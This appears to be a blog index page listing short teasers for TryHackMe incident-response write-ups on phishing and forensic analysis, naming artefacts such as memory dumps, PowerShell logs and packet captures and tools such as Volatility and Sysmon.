Welcome🖐

Refer to Boogeyman2 for the challenge room on TryHackMe Artefacts For the investigation, we will receive the following items: A copy of the phishing email. A memory dump of the victim's workstation. Tools $ volatility_3: An open-source framework for extracting data from RAM samples. Note: It may take a few... [Read More]

Refer to Boogeyman1 for the challenge room on TryHackMe Artefacts For the investigation, we will be provided with the following artefacts: Copy of the phishing email (`dump.eml`) PowerShell logs from Julianne's workstation (`powershell.json`) Packet capture from the same workstation (`capture.pcapng`) Note: The powershell.json file contains JSON-formatted PowerShell logs extracted from... [Read More]

Refer to Tempest for the challenge room on TryHackMe Preparation - Tools and Artifacts Toolset Sysmon Logs Windows Event Logs Packet Capture Endpoint Logs To analyze Windows artefacts like Windows Event Logs and Sysmon logs, we will use the following tools: EvtxEcmd Timeline Explorer SysmonView Event Viewer Endpoint Logs To... [Read More]

Refer to Snapped Phish-ing Line for the challenge room on TryHackMe Scenario As an IT department personnel at SwiftSpend Financial, one of your responsibilities is to assist employees with their technical concerns. While everything seemed routine, the situation changed when several employees from various departments began reporting an unusual email... [Read More]

Refer to The Greenholt Phish for the challenge room on TryHackMe Scenario A Sales Executive at Greenholt PLC received an unexpected email from a customer. He noted that the customer typically does not use generic greetings like "Good day" and that he was not expecting any money to be transferred... [Read More]